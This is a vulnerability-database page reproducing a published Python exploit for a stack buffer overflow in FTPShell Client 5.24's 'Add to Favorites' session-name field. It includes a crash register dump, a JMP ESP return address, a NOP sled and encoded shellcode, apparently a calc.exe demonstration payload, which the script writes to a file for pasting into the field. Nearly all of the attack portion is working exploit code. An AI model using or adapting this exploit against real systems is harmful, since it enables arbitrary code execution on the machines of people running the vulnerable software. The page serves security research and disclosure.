Vulners
Lucene search
FTPShell Client 5.24 - Add to Favorites Buffer Overflow
# Exploit Title: FTPShell Client 5.24 - Add to Favorites Buffer Overflow
# Google Dork: N/A
# Date: 2015-01-04
# Exploit Author: INSECT.B
# Twitter : @INSECT.B
# Facebook : https://www.facebook.com/B.INSECT00
# Blog : http://binsect00.tistory.com
# Vendor Homepage: www.ftpshell.com
# Software Link: http://www.ftpshell.com/download.htm
# Version: 5.24
# Tested on: Windows7 Ultimate SP1 K x86
# CVE : N/A
"""
[+] Type : Buffer Overflow
[-] ftpsehll client has a buffer overlow entry point in the [Favorites] - [Add to favorites..] 'Session name' input field
[-] used to add session to favorites list .
[+]Crash : input 'A' x 1500 to Session name field
[-] (4c4.8f8): Access violation - code c0000005 (!!! second chance !!!)
[-] eax=00000000 ebx=00944a0c ecx=00000000 edx=41414141 esi=00000500 edi=0012fe1c
[-] eip=41414141 esp=0012fd54 ebp=41414141 iopl=0 nv up ei pl zr na pe nc
[-] cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246
[-] 41414141 ?? ???
"""
import struct
junk = "A"*460
junk2 = "\x90"*248
esp = "\x0B\xD4\xDF\x73" # JMP ESP
#shellcode
#CMD : calc.exe
#encoder : Alpha-mix encoder
#buffer register : esp
sc = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" +
"\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42" +
"\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x38\x68" +
"\x4b\x32\x33\x30\x75\x50\x63\x30\x65\x30\x6c\x49\x5a\x45" +
"\x65\x61\x39\x50\x35\x34\x4c\x4b\x46\x30\x54\x70\x4e\x6b" +
"\x63\x62\x46\x6c\x6e\x6b\x43\x62\x47\x64\x4c\x4b\x44\x32" +
"\x46\x48\x74\x4f\x4f\x47\x51\x5a\x37\x56\x35\x61\x59\x6f" +
"\x6e\x4c\x45\x6c\x43\x51\x53\x4c\x43\x32\x44\x6c\x65\x70" +
"\x5a\x61\x5a\x6f\x74\x4d\x37\x71\x6a\x67\x4a\x42\x39\x62" +
"\x76\x32\x42\x77\x6c\x4b\x31\x42\x36\x70\x4e\x6b\x33\x7a" +
"\x57\x4c\x6e\x6b\x32\x6c\x66\x71\x42\x58\x78\x63\x53\x78" +
"\x73\x31\x7a\x71\x36\x31\x4e\x6b\x66\x39\x51\x30\x36\x61" +
"\x59\x43\x6e\x6b\x57\x39\x62\x38\x58\x63\x45\x6a\x52\x69" +
"\x6c\x4b\x44\x74\x4e\x6b\x55\x51\x7a\x76\x70\x31\x69\x6f" +
"\x6c\x6c\x6f\x31\x48\x4f\x36\x6d\x65\x51\x7a\x67\x76\x58" +
"\x59\x70\x61\x65\x48\x76\x53\x33\x71\x6d\x4b\x48\x35\x6b" +
"\x61\x6d\x36\x44\x31\x65\x4b\x54\x30\x58\x6e\x6b\x66\x38" +
"\x76\x44\x56\x61\x4e\x33\x51\x76\x6c\x4b\x74\x4c\x72\x6b" +
"\x6e\x6b\x71\x48\x47\x6c\x57\x71\x7a\x73\x4c\x4b\x66\x64" +
"\x6e\x6b\x36\x61\x6e\x30\x4d\x59\x50\x44\x57\x54\x66\x44" +
"\x63\x6b\x71\x4b\x61\x71\x63\x69\x61\x4a\x36\x31\x39\x6f" +
"\x59\x70\x61\x4f\x61\x4f\x52\x7a\x4c\x4b\x64\x52\x5a\x4b" +
"\x6e\x6d\x31\x4d\x32\x4a\x75\x51\x6c\x4d\x4b\x35\x48\x32" +
"\x75\x50\x65\x50\x67\x70\x66\x30\x73\x58\x65\x61\x4c\x4b" +
"\x52\x4f\x6b\x37\x59\x6f\x48\x55\x4d\x6b\x38\x70\x78\x35" +
"\x59\x32\x33\x66\x72\x48\x79\x36\x5a\x35\x6d\x6d\x4d\x4d" +
"\x6b\x4f\x58\x55\x45\x6c\x33\x36\x61\x6c\x76\x6a\x6b\x30" +
"\x6b\x4b\x4d\x30\x54\x35\x45\x55\x4f\x4b\x62\x67\x37\x63" +
"\x70\x72\x70\x6f\x70\x6a\x45\x50\x46\x33\x69\x6f\x49\x45" +
"\x50\x63\x65\x31\x50\x6c\x71\x73\x46\x4e\x42\x45\x70\x78" +
"\x73\x55\x75\x50\x41\x41"
)
payload = junk + esp + sc + junk2
file=open("C:\\shelll","w")
file.write(payload)
file.close()
# 0day.today [2018-03-12] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Jan 2016 00:00Current
6.8Medium risk
Vulners AI Score6.8